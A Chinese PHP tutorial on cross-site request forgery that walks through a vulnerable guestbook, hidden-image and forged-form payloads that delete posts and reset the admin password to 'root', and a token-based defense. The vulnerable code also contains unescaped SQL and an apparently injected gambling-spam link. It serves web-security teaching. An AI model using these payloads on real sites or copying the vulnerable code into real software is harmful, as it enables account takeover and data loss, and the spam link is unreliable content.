php漏洞之跨网站请求伪造与防止伪造方法

 更新时间:2013年08月15日 17:53:56   作者:   我要评论
今天我来给大家介绍在php中跨网站请求伪造的实现方法与最后我们些常用的防止伪造的具体操作方法,有需要了解的朋友可进入参考
伪造跨站请求介绍
伪造跨站请求比较难以防范,而且危害巨大,攻击者可以通过这种方式恶作剧,发spam信息,删除数据等等。这种攻击常见的表现形式有:
  伪造链接,引诱用户点击,或是让用户在不知情的情况下访问
  伪造表单,引诱用户提交。表单可以是隐藏的,用图片或链接的形式伪装。
  比较常见而且也很廉价的防范手段是在所有可能涉及用户写操作的表单中加入一个随机且变换频繁的字符串,然后在处理表单的时候对这个字符串进行检查。这个随机字符串如果和当前用户身份相关联的话,那么攻击者伪造请求会比较麻烦。
如果攻击者以隐藏的方式发送给目标用户链接
<img src="/buy.php?item=watch&num=1000"/>,那么如果目标用户不小心访问以后,购买的数量就成了1000个
实例
随缘网络PHP留言板V1.0
复制代码 代码如下:

任意删除留言
//delbook.php 此页面用于删除留言
<?php
include_once("dlyz.php");    //dlyz.php用户验证权限,当权限是admin的时候方可删除留言
include_once("../conn.php");
$del=$_GET["del"];
$id=$_GET["id"];
if ($del=="data")
{
$ID_Dele= implode(",",$_POST['adid']);
$sql="delete from book where id in (".$ID_Dele.")";
mysql_query($sql);
}
else
{
$sql="delete from book where id=".$id; //传递要删除的留言ID
mysql_query($sql);
}
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('删除成功!');";
echo " location='book.php';";
echo "</script>";
?>

当我们具有admin权限,提交http://localhost/manage/delbook.php?id=2 时,就会删除id为2的留言
利用方法:
我们使用普通用户留言(源代码方式),内容为
复制代码 代码如下:

<img src="delbook.php?id=2" />
<img src="delbook.php?id=3" />
<img src="delbook.php?id=4" />
<img src="delbook.php?id=5" />

插入4张图片链接分别删除4个id留言,然后我们返回首页浏览看,没有什么变化。。图片显示不了
现在我们再用管理员账号登陆后,来刷新首页,会发现留言就剩一条,其他在图片链接中指定的ID号的留言,全部都被删除。
攻击者在留言中插入隐藏的图片链接,此链接具有删除留言的作用,而攻击者自己访问这些图片链接的时候,是不具有权限的,所以看不到任何效果,但是当管理员登陆后,查看此留言,就会执行隐藏的链接,而他的权限又是足够大的,从而这些留言就被删除了
修改管理员密码
复制代码 代码如下:

//pass.php
if($_GET["act"])
{
$username=$_POST["username"];
$sh=$_POST["sh"];
$gg=$_POST["gg"];
$title=$_POST["title"];
$copyright=$_POST["copyright"]."<br/>网站:<a href=//www.sxglgf.com>澳门金沙网上娱乐</a>";
$password=md5($_POST["password"]);
if(empty($_POST["password"]))
{
$sql="update gly set username='".$username."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
else
{
$sql="update gly set username='".$username."',password='".$password."',sh=".$sh.",gg='".$gg."',title='".$title."',copyright='".$copyright."' where id=1";
}
mysql_query($sql);
mysql_close($conn);
echo "<script language='javascript'>";
echo "alert('修改成功!');";
echo " location='pass.php';";
echo "</script>";
}
这个文件用于修改管理密码和网站设置的一些信息,我们可以直接构造如下表单:
<body>
<form action="http://localhost/manage/pass.php?act=xg" method="post" name="form1" id="form1">
<input type="radio" value="1"  name="sh">
<input type="radio" name="sh" checked value="0">
<input type="text" name="username" value="root">
<input type="password" name="password" value="root">
<input type="text"  name="title"  value="随缘网络PHP留言板V1.0(带审核功能)" >
<textarea  name="gg"  rows="6" cols="80" >欢迎您安装使用随缘网络PHP留言板V1.0(带审核功能)!</textarea>
<textarea  name="copyright"  rows="6" cols="80" >随缘网络PHP留言本V1.0  版权所有:厦门随缘网络科技 2005-2009<br/>承接网站建设及系统定制 提供优惠主机域名</textarea>
</form>
</body>

存为attack.html,放到自己网站上//www.sxglgf.com此页面访问后会自动向目标程序的pass.php提交参数,用户名修改为root,密码修改为root,然后我们去留言板发一条留言,隐藏这个链接,管理访问以后,他的用户名和密码全部修改成了root
防止伪造跨站请求
yahoo对付伪造跨站请求的办法是在表单里加入一个叫.crumb的随机串;而facebook也有类似的解决办法,它的表单里常常会有post_form_id和fb_dtsg。
随机串代码实现
咱们按照这个思路,山寨一个crumb的实现,代码如下:
复制代码 代码如下:

<?php
class Crumb {
CONST SALT = "your-secret-salt";
static $ttl = 7200;
static public function challenge($data) {
return hash_hmac('md5', $data, self::SALT);
}
static public function issueCrumb($uid, $action = -1) {
$i = ceil(time() / self::$ttl);
return substr(self::challenge($i . $action . $uid), -12, 10);
}
static public function verifyCrumb($uid, $crumb, $action = -1) {
$i = ceil(time() / self::$ttl);
if(substr(self::challenge($i . $action . $uid), -12, 10) == $crumb ||
substr(self::challenge(($i - 1) . $action . $uid), -12, 10) == $crumb)
return true;
return false;
}
}

代码中的$uid表示用户唯一标识,而$ttl表示这个随机串的有效时间。
  应用示例
  构造表单
  在表单中插入一个隐藏的随机串crumb
复制代码 代码如下:

<form method="post" action="demo.php">
<input type="hidden" name="crumb" value="<?php echo Crumb::issueCrumb($uid)?>">
<input type="text" name="content">
<input type="submit">
</form>

处理表单 demo.php
  对crumb进行检查
复制代码 代码如下:

<?php
if(Crumb::verifyCrumb($uid, $_POST['crumb'])) {
//按照正常流程处理表单
} else {
//crumb校验失败,错误提示流程
}
?>

相关文章

  • Apache下禁止php文件被直接访问的解决方案

    Apache下禁止php文件被直接访问的解决方案

    想在重写规则里直接禁止php后缀的URL被访问。但后来发现重写规则是递归调用的,如果在重写规则里直接禁止php,那么重写到php文件的规则也会失效,于是有了下面的方法
    2013-04-04
  • php常用经典函数集锦【数组、字符串、栈、队列、排序等】

    php常用经典函数集锦【数组、字符串、栈、队列、排序等】

    这篇文章主要介绍了php常用经典函数,总结分析了php数组、字符串、栈、队列、排序等相关函数功能与使用技巧,需要的朋友可以参考下
    2019-08-08
  • PHPExcel简单读取excel文件示例

    PHPExcel简单读取excel文件示例

    这篇文章主要介绍了PHPExcel简单读取excel文件的方法,结合实例形式简单分析了PHPExcel针对Excel文件的读取操作技巧,需要的朋友可以参考下
    2016-05-05
  • WordPress中查询文章的循环Loop结构及用法分析

    WordPress中查询文章的循环Loop结构及用法分析

    这篇文章主要介绍了WordPress中查询文章的循环Loop结构及用法分析,顺带介绍了提供各种查询方法的WP_Query类的一些基本情况,需要的朋友可以参考下
    2015-12-12
  • 利用php生成验证码

    利用php生成验证码

    本文主要分享了利用php生成验证码的示例代码,具有很好的参考价值,下面跟着小编一起来看下吧
    2017-02-02
  • 一篇入门的php Class 文章

    一篇入门的php Class 文章

    一篇入门的php Class 文章...
    2007-04-04
  • 如何设置mysql允许外网访问

    如何设置mysql允许外网访问

    本篇文章是对设置mysql允许外网访问的解决方法进行了详细的分析介绍,需要的朋友参考下
    2013-06-06
  • PHP多线程类及用法实例

    PHP多线程类及用法实例

    这篇文章主要介绍了PHP多线程类及用法,实例分析了多线程类的具体实现方法及应用技巧,并结合下载远程图片的实例予以深入分析,需要的朋友可以参考下
    2014-12-12
  • php中替换字符串函数strtr()和str_repalce()的用法与区别

    php中替换字符串函数strtr()和str_repalce()的用法与区别

    在php中替换函数主要有strtr(),str_repalce()这两个函数,下面这篇文中主要给大家介绍下这两者之间的区别和用法,文中通过示例代码介绍的很详细,有需要的朋友们可以参考借鉴,下面跟着小编一起来学习学习吧。
    2016-11-11
  • PHP中函数rand和mt_rand的区别比较

    PHP中函数rand和mt_rand的区别比较

    mt_rand() 比rand() 快四倍,很多老的 libc 的随机数发生器具有一些不确定和未知的特性而且很慢。PHP 的 rand() 函数默认使用 libc 随机数发生器。mt_rand() 函数是非正式用来替换它的。
    2012-12-12

最新评论